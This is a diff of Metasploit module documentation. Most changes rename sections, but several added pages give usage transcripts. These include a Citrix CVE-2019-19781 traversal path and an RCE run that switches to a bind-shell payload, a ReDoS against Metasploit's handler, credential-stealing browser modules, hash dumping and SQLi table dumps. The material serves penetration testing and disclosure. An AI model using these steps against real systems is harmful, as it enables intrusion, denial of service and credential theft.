+
+## Verification Steps
+
+  1. Install Metasploit 5.0.27 or earlier (or checkout before commit 5621d200ccf62e4a8f0dad80c1c74f4e0e52d86b)
+  2. Start msfconsole with the target Metasploit instance and start any reverse_http/reverse_https listener
+  3. Start this module and set RHOSTS and RPORT to the target listener address and port.
+  4. Run the modulest <rhost>```
+  7. `msfconsole` should use 99%+ CPU for a varying amount of time depending on the DOSTYPE option. You may need to kill the process manually.
+
+## Options
+
+ **DOSTYPE**
+
+	GENTLE: *Current sessions will continue to work, but not future ones*
+	  A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
+
+	SOFT: *No past or future sessions will work*
+      A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+
+	HARD: *ReDOS or Catastrophic Regex Backtracking*
+	  A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
+
+## Scenarios
+
+```
+msf5 auxiliary(dos/http/metasploit_httphandler_dos) > run
+[*] Running module against 127.0.0.1
+
+[*] 127.0.0.1:8080 - Sending DoS packet...
+^C[-] Stopping running againest current target...
+[*] Control-C again to force quit all targets.
+[*] Auxiliary module execution completed
+```
@@ -55,7 +55,7 @@ at ../src/ephy-main.c line 432

 ```

-## Verification
+## Verification Steps

    Start msfconsole
    use auxiliary/dos/http/webkitplus
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module exploits three vulnerabilities in Advantech WebAccess.

@@ -12,9 +12,6 @@ The final vulnerability exploited is that the HTML Form on the user edit page co
 plain text password in the masked password input box. Typically the system should replace the
 actual password with a masked character such as "*".

-
-## Vulnerable Application
-
 Version 8.1 was tested during development:

 http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
@@ -41,7 +38,6 @@ The username to use to log into Advantech WebAccess. By default, there is a buil
 The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
 does not have a password, which could be something you can use.

-
-## Demo
+## Scenarios

 ![webaccess_steal_creds](https://cloud.githubusercontent.com/assets/1170914/22353246/34b2045e-e3e5-11e6-992c-f3ab9dcbe716.gif)
@@ -4,7 +4,7 @@ This module retrieves a browser's network interface IP addresses using WebRTC. H

 Related links : https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html

-## Verification
+## Verification Steps

    Start msfconsole
    use auxiliary/gather/browser_lanipleak
@@ -1,4 +1,7 @@
-The module use the Censys REST API to access the same data accessible through web interface. The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+## Vulnerable Application
+
+The module use the Censys REST API to access the same data accessible through web interface.
+The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.

 ## Verification Steps

@@ -207,8 +210,3 @@ msf auxiliary(censys_search) > run
 [+] wesecure.nl - [997423]
 [*] Auxiliary module execution completed
 ```
-
-
-## References
-
-1. https://censys.io/api
@@ -9,7 +9,7 @@ accounts are enabled or disabled/locked out.
 To use kerberos_enumusers, make sure you are able to connect to the
 Kerberos service on a Domain Controller.

-## Scenario
+## Scenarios

 The following demonstrates basic usage, using a custom wordlist,
 targeting a single Domain Controller to identify valid domain user
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 Nuuo CMS Session Bruteforce

@@ -49,8 +49,6 @@ Secondly, due to the nature of this application, it is normal to have the softwa

 It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received. 

-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions below 2.4.0](d1.nuuo.com/NUUO/CMS/)

 - 1.5.2 OK
@@ -73,9 +71,3 @@ msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_bruteforce) >
 ```
-
-## References
-
-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 Nuuo CMS Authenticated Arbitrary File Download

@@ -26,8 +26,6 @@ This module works in the following way:

 Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.

-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)

 The following versions were tested:
@@ -63,9 +61,3 @@ msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_file_download) >
 ```
-
-## References
-
- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 External python module compatible with v2 and v3.

 Enumerate valid usernames (email addresses) from Office 365 using ActiveSync.
@@ -14,9 +16,7 @@ Microsoft Security Response Center stated on 2017-06-28 that this issue does not

 This script is maintaing the ability to run independently of MSF.

-## Vulnerable Application
-
-  Office365's implementation of ActiveSync
+Office365's implementation of ActiveSync is vulnerable.

 ## Verification Steps

@@ -41,6 +41,7 @@ This script is maintaing the ability to run independently of MSF.


 ## Scenarios
+
 The following demonstrates basic usage, using the supplied users wordlist
 and default options.

@@ -72,6 +73,3 @@ grimhacker.com  ..        |
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
-
-## References
-https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/
@@ -1,10 +1,11 @@
-## Description
-This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
-
 ## Vulnerable Application
+
 This Module was tested on Samsung Internet Browser 5.4.02.3 during development.

+This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
+
 ## Verification Steps
+
 1. Start `msfconsole -q`
 2. `use auxiliary/gather/samsung_browser_sop_bypass`
 3. `set SRVHOST`
@@ -14,6 +15,7 @@ This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
 5. `run`

 ## Scenarios
+
 ```
 $ sudo msfconsole -q
 msf > use auxiliary/gather/samsung_browser_sop_bypass
@@ -49,8 +51,6 @@ host            origin          service          public          private
 msf auxiliary(samsung_browser_sop_bypass) >
 ```

-## Demos
-
 Working of MSF Module: `https://youtu.be/ulU98cWVhoI`

 Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`
@@ -1,5 +1,5 @@

-## About
+## Description

 This module simply queries the DB2 discovery service for information.
 The discovery service is integrated with the Configuration Assistant and the DB2® administration server.
@@ -12,9 +12,10 @@ Using the discovery method, catalog information for a remote server can be autom
 3. `set THREDS [number of threads]`
 4. `run`

-
 ## Scenarios
- DB2 `9.07.2` running at a `RHEL 6.9` .
+
+### DB2 9.07.2 on RHEL 6.9
+
 ```
 msf auxiliary(scanner/db2/discovery) > set RHOSTS 192.168.1.25
 msf auxiliary(scanner/db2/discovery) > run
@@ -1,10 +1,10 @@
+## Vulnerable Application
+
 This module exploits a directory traversal vulnerability in Easy File Sharing FTP Server 3.6, or
 prior. It abuses the RETR command in FTP in order to retrieve a file outside the shared directory.

 By default, anonymous access is allowed by the FTP server.

-## Vulnerable Application
-
 Easy File Sharing FTP Server version 3.6 or prior should be affected. You can download the
 vulnerable application from the official website:

@@ -22,6 +22,6 @@ The FTP server IP address.

 The file you wish to download. Assume this path starts from C:\

-## Demonstration
+## Scenarios

 ![ftp](https://cloud.githubusercontent.com/assets/1170914/23971054/4fdc2b08-099a-11e7-88ea-67a678628e49.gif)
@@ -1,9 +1,7 @@
-## Description
+## Vulnerable Application

 This module allows you to authenticate to Advantech WebAccess.

-## Vulnerable Application
-
 This module was specifically tested on versions 8.0, 8.1, and 8.2:

 **8.2 Download**
@@ -23,7 +21,6 @@ Note:
 By default, Advantech WebAccess comes with a built-in account named ```admin```, with a blank
 password.

-
 ## Verification Steps

 1. Make sure Advantech WebAccess is up and running
@@ -34,6 +31,6 @@ password.
 6. ```run```
 7. You should see that the module is attempting to log in.

-## Demo
+## Scenarios

 ![webaccess_login_demo](https://cloud.githubusercontent.com/assets/1170914/22352301/26549236-e3e1-11e6-9710-506166a8bee3.gif)
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+This module determines if usernames are valid on a server running Apache with the `UserDir` directive enabled. 
+It takes advantage of Apache returning different error codes for usernames that do not exist and for usernames
+that exist but have no `public_html` directory.
+
+### Enabling  `UserDir` on Ubuntu 16.04 with Apache installed
+1. `sudo a2enmod userdir`
+2. `sudo service apache2 restart`
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/apache_userdir_enum```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Scenarios
+
+### Apache 2.4.18 on Ubuntu 16.04
+
+![apache_userdir_enum Demo](https://i.imgur.com/UZanfTI.gif)
+
+```
+msf5 > use auxiliary/scanner/http/apache_userdir_enum
+msf5 auxiliary(scanner/http/apache_userdir_enum) > set rhosts alderaan
+rhosts => alderaan
+msf5 auxiliary(scanner/http/apache_userdir_enum) > run
+
+[*] http://192.168.6.172/~ - Trying UserDir: ''
+[*] http://192.168.6.172/ - Apache UserDir: '' not found
+[*] http://192.168.6.172/~4Dgifts - Trying UserDir: '4Dgifts'
+[*] http://192.168.6.172/ - Apache UserDir: '4Dgifts' not found
+...
+[*] http://192.168.6.172/~zabbix - Trying UserDir: 'zabbix'
+[*] http://192.168.6.172/ - Apache UserDir: 'zabbix' not found
+[*] http://192.168.6.172/~vagrant - Trying UserDir: 'vagrant'
+[*] http://192.168.6.172/ - Apache UserDir: 'vagrant' not found
+[+] http://192.168.6.172/ - Users found: backup, bin, daemon, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, proxy, sshd, sync, sys, syslog, uucp
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -1,10 +1,9 @@
+## Vulnerable Application
+
 This module exploits a vulnerability found in Cisco Firepower Management console. A logged in
 user can abuse the report viewing feature to download an arbitrary file. Authentication is
 required to exploit this vulnerability.

-
-## Vulnerable Application
-
 This module was written specifically against Cisco Firepower Management 6.0.1 (build 1213) during
 development. To test, you may download the virtual appliance here:

@@ -26,6 +25,6 @@ admin:Admin123 by default:
 If the file is found, it will be saved in the loot directory. If not found, the module should
 print an error indicating so.

-## Demo
+## Scenarios

 ![cisco_download_demo](https://cloud.githubusercontent.com/assets/1170914/21782825/78ada38e-d67a-11e6-9b7b-c7b8e2956fba.gif)
@@ -0,0 +1,57 @@
+## Introduction
+
+An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. The vulnerability, tracked as CVE-2019-19781, allows for directory traversal. If exploited, it could allow an unauthenticated attacker to perform arbitrary code execution.
+
+Because vulnerable servers allow for directory traversal, they will accept the request `GET /vpn/../vpns/` and process it as a request for `GET /vpns/`, a directory that contains PERL scripts that can be targeted to allow for limited file writing on the vulnerable host.
+
+This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf`and then checking the response for `[global]` since this configuration file should contain global variables. If `[global]` is found, the server is vulnerable to CVE-2019-19781.
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/citrix_dir_traversal`
+4. Do: `set RHOSTS [IP]`
+5. Do: `run`
+
+## Options
+
+1. `Proxies`. This option is not set by default.
+2. `RPORT`. The default setting is `80`. To use: `set RPORT [PORT]`
+3. `SSL`. The default setting is `false`.
+4. `THREADS`. The default setting is `1`.
+5. `VHOST`. This option is not set by default.
+6. `TARGETURI`. This option is the base path. `/` by default.
+7. `PATH`. This option is the traversal path. `/vpn/../vpns/cfg/smb.conf` by default.
+
+## Scenarios
+
+```
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > options
+
+Module options (auxiliary/scanner/http/citrix_dir_traversal):
+
+   Name       Current Setting            Required  Description
+   ----       ---------------            --------  -----------
+   PATH       /vpn/../vpns/cfg/smb.conf  yes       Traversal path
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080                       yes       The target port (TCP)
+   SSL        false                      no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                          yes       Base path
+   THREADS    1                          yes       The number of concurrent threads (max one per host)
+   VHOST                                 no        HTTP server virtual host
+
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > run
+
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/citrix_dir_traversal) >
+```
+
+## References
+
+1. <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>
+2. <https://support.citrix.com/article/CTX267027>
@@ -9,7 +9,7 @@ The device has at least two (2) users - admin and user. Due to an access control
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_web_login_loot
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module scans one or more web servers for interesting directories that can be further explored.

@@ -9,7 +9,7 @@ Related links :
 * https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
 * http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip - Download Oracle Glass Fish 4.1

-## Verification
+## Verification Steps

  1. Start msfconsole
  2. Do: ```use auxiliary/scanner/http/glassfish_traversal```
@@ -11,7 +11,7 @@ This module can abuse misconfigured web servers to upload and delete web content
 6. Do: ```set FILEDATA [PATH]```
 7. Do: ```run```

-## Options 
+## Options

 ### ACTION

@@ -1,13 +1,15 @@
-
-## Microsoft IIS shortname vulnerability scanner
-
-The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
-
 ## Vulnerable Application

-Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS
-  
-  
+The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers
+to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request)
+this was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
+
+Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS 
+
+### Remediation
+
+Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
+
 ## Verification Steps

  1. Install IIS (default installations are vulnerable)
@@ -51,13 +53,3 @@ Older Microsoft IIS installations are vulnerable with GET, newer installations w
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host
 ```
-
-## Remediation
-
-Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
-
-
-## References
-
-  * https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
-  * https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability
@@ -12,7 +12,7 @@
  * [RIPS v0.54 Source](https://sourceforge.net/projects/rips-scanner/files/rips-0.54.zip/download)


-## Verification
+## Verification Steps

  1. Start `msfconsole`
  2. `use auxiliary/scanner/http/rips_traversal`
@@ -1,13 +1,11 @@
-## Description
+## Vulnerable Application

 This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
 Spring Cloud Config listens by default on port 8888.

-### Vulnerable Application
-
 * https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip

-## Verification
+## Verification Steps

 1. `./msfconsole`
 2. `use auxiliary/scanner/http/springcloud_traversal`
@@ -29,7 +27,3 @@ msf auxiliary(scanner/http/springcloud_traversal) > run
 [*] Auxiliary module execution completed
 msf auxiliary(scanner/http/springcloud_traversal) >
 ```
-
-## References
-
-* https://pivotal.io/security/cve-2019-3799
@@ -34,11 +34,15 @@ Affecting total.js package, versions:

 ## Options

-* **TARGETURI**: Path to Total.js App installation (“/” is the default)
-* **DEPTH**: Traversal depth (“1” is the default)
-* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
+ **DEPTH**

-## Scenario
+  Traversal depth. Default is `1`
+
+ **FILE**
+
+  File to obtain. Default is `databases/settings.json`
+
+## Scenarios

 ### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0

@@ -0,0 +1,34 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.
+
+### Vulnerable Application
+
+* http://en.tvt.net.cn/upload/service/NVMS1000.zip
+
+## Verification
+
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/tvt_nvms_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Windows 7 SP1
+
+```
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152
+RHOSTS => 192.168.43.152
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run
+
+[+] File saved in: /root/.msf4/loot/20191230124941_default_192.168.43.152_nvms.traversal_240600.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) >
+```
+
+## References
+
+* https://www.exploit-db.com/exploits/47774
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20085
@@ -1,15 +1,11 @@
-## Description
+## Vulnerable Application
+
  This module attempts to authenticate against a Wordpress-site (via 
  XMLRPC) using username and password combinations indicated by the 
  `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.

-## References
-* [https://codex.wordpress.org/XML-RPC_Support](https://codex.wordpress.org/XML-RPC_Support)
-* [http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/](http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/)
-
-## Vulnerable Application
-
 ### Setup using Docksal
+
 Install [Docksal](https://docksal.io/)

 Create a new WordPress installation using `fin project create`
@@ -4,7 +4,7 @@ Exchange installations to enumerate email.

 Error-based user enumeration for Office 365 integrated email addresses

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/exchange_enum`
@@ -11,7 +11,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.

 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/host_id`
@@ -6,7 +6,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.

 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/onprem_enum`
@@ -13,7 +13,7 @@ Detects a closed port via a RST received in response to the FIN
  XMAS scan requires the use of raw sockets, and thus cannot be performed from some Windows
  systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.

-# Options
+## Options

  **PORTS**
  
@@ -34,7 +34,7 @@ Detects a closed port via a RST received in response to the FIN
  Gives detailed message about the scan of all the ports. It also shows the
  ports that were not open/filtered.

-# Verification Steps
+## Verification Steps

  1. Do: `use auxiliary/scanner/portscan/xmas`
  2. Do: `set RHOSTS [IP]`
@@ -42,7 +42,7 @@ Detects a closed port via a RST received in response to the FIN
  4. Do: `run`
  5. The open/filtered ports will be discovered, status will be printed indicating as such.

-# Scenarios
+## Scenarios
  
 ### Metaspliotable 2

@@ -57,7 +57,7 @@ IP, Subnetmask and Gateway are: 172.16.30.102, 255.255.0.0, 172.16.0.1
 [*] Auxiliary module execution completed
 ```

-## Module Options
+## Options
 ```
 msf auxiliary(profinet_siemens) > show options

@@ -31,7 +31,7 @@ Currently supported objects are:
  module user to view the output but also causes it to be written to disk before
  it is retrieved and deleted.

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/dcomexec) > show options 
@@ -9,7 +9,7 @@
 1. Set: `RHOSTS`, `SMBUser`, `SMBPass`
 1. Do: `run`, see hashes from the remote machine

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > show options 
@@ -18,7 +18,7 @@
  module user to view the output but also causes it to be written to disk before
  it is retrieved and deleted.

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > show options 
@@ -7,7 +7,7 @@ Cambium cnPilot r200/r201 devices can be administered using SNMP. The device con
 3. Do: ```set COMMUNITY public```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/snmp/cnpilot_r_snmp_loot
@@ -11,7 +11,7 @@ Note: If the backup url is not retrieved, it is recommended to increase the TIME
 3. Do: ```set COMMUNTY [SNMP_COMMUNUTY_STRING]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/snmp/epmp_snmp_loot
@@ -1,6 +1,6 @@
 Some TLS implementations handle errors processing RSA key exchanges and encryption (PKCS #1 v1.5 messages) in a broken way that leads an adaptive chosen-chiphertext attack. Attackers cannot recover a server's private key, but they can decrypt and sign messages with it. A strong oracle occurs when the TLS server does not strictly check message formatting and needs less than a million requests on average to decode a given ciphertext. A weak oracle server strictly checks message formatting and often requires many more requests to perform the attack.

-## Vulnerable Applications
+## Vulnerable Application

 * F5 BIG-IP 11.6.0-11.6.2 (fixed in 11.6.2 HF1), 12.0.0-12.1.2 HF1 (fixed in 12.1.2 HF2), or 13.0.0-13.0.0 HF2 (fixed in 13.0.0 HF3) (CVE 2017-6168)
 * Citrix NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 (CVE 2017-17382)
@@ -12,7 +12,7 @@ The following versions of SenNet Data Logger and Electricity Meters, monitoring
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/telnet/satel_cmd_exec
@@ -1,7 +1,7 @@
 Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and
 feel different for you. Here are the features you should know about before using.

-## Vulnerable Applications
+## Vulnerable Application

 Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:

@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 This module exploits a SQLi vulnerability found in
 OpenEMR version 5.0.1 Patch 6 and lower. The
@@ -10,18 +10,6 @@ This module saves each table as a `.csv` file in your
 loot directory and has been tested with
 OpenEMR 5.0.1 (3).

-
-## Author
-
-Will Porter (will.porter@lodestonesecurity.com) from Lodestone Security
-
-
-## References
-
-https://www.cvedetails.com/cve/CVE-2018-17179/
-https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617
-
-
 ## Options

 ```
@@ -39,7 +27,7 @@ Module options (auxiliary/sqli/openemr/openemr_sqli_dump):
   VHOST                       no        HTTP server virtual host
 ```

-## Usage
+## Scenarios

 This module has both `check` and `run` functions.

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module uses the su binary present on rooted devices to run a payload as root.

@@ -8,12 +8,10 @@ temporary directory, make it executable, execute it in the background, and final

 On most devices the su binary will pop-up a prompt on the device asking the user for permission.

-## Vulnerable Application
-
 This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
 Many devices can be rooted by flashing new firmware, however the existing data will be lost.

-## Verfication steps
+## Scenarios

 You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)

@@ -35,7 +35,7 @@ Change dictory to CVE-2017-1263X, and run `docker-compose up -d`
  9. Do: ``exploit``
  10. You should get a shell.

-## Options   
+## Options

 - URIPATH

@@ -40,28 +40,34 @@ https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-2
 ## Options

 **RHOSTS**
+
 Configure the remote vulnerable system.

 **RPORT**
+
 Configure the TCP port of the HTTP/HTTPS management web interface.

 **USE_SSL**
+
 This flag controls whether the remote management web interface is accessible
 via HTTPS or not. Should be false for HTTP and true for HTTPS.

 **PAYLOAD**
+
 Configure the Metasploit payload that you want to stage. Must be for MIPS64
 arch.  Set payload Options accordingly.

 **SRVHOST**
+
 The module stages the payload via a web server. This is the binding interface
 IP. Default can be set to 0.0.0.0. 

 **HTTPDelay**
+
 This configures how long the module should wait for the incoming HTTP
 connection to the HTTP stager.

-## Verification Steps:
+## Verification Steps

 1. Have exploitable RV320 or RV325 router (exampe IP: 192.168.1.1):
 2. Start `msfconsole`:
@@ -74,7 +80,7 @@ connection to the HTTP stager.
 9. Gives you a privileged (uid=0) shell or in the example a meterpreter session.


-## Scenario
+## Scenarios

 Exploiting a vulnerable RV320 router with publicly accessible HTTPS web
 interface on TCP port 443: 
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 The Cisco UCS Director virtual appliance contains two flaws that can be combined
 and abused by an attacker to achieve remote code execution as root.
@@ -16,21 +16,7 @@ Note that Cisco also mentions in their advisory that their IMC Supervisor and
 UCS Director Express are also affected by these vulnerabilities, but this module
 was not tested with those products.

-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj
-FULL_DISC
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt
-
-
-## Usage
+## Scenarios

 Setup RHOST, LHOST, LPORT and run it!

@@ -0,0 +1,76 @@
+## Introduction
+
+A directory traversal was discovered in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0.
+
+When the NSPPE receives a request for `GET /vpn/index.html`, it is supposed to send this request to Apache, which processes it. However, by making the request `GET /vpn/../vpns/` (which is not sanitized), Apache transforms the route into `GET /vpns/` and processes this last request normally.
+
+This `/vpns/` directory is interesting because it contains Perl code. The script `newbm.pl` creates an array containing information from several parameters, then calls the `filewrite` function, which writes the content to an XML file on disk.
+
+A malicious attacker can execute arbitrary commands remotely by creating a corrupted XML file that uses the Perl Template Toolkit in part of payload.
+
+```
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
+
+[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[+] The target appears to be vulnerable
+[*] Yeeting cmd/unix/generic payload at 127.0.0.1:8080
+[*] Generated payload: id
+uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
+
+[!] This exploit may require manual cleanup of '/netscaler/portal/templates/mdjLHiHtIYmh.xml' on the target
+[!] This exploit may require manual cleanup of '/var/tmp/netscaler/portal/templates/mdjLHiHtIYmh.xml.ttc2' on the target
+[*] Exploit completed, but no session was created.
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl
+payload => cmd/unix/bind_perl
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
+
+[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[+] The target appears to be vulnerable
+[*] Yeeting cmd/unix/bind_perl payload at 127.0.0.1:8080
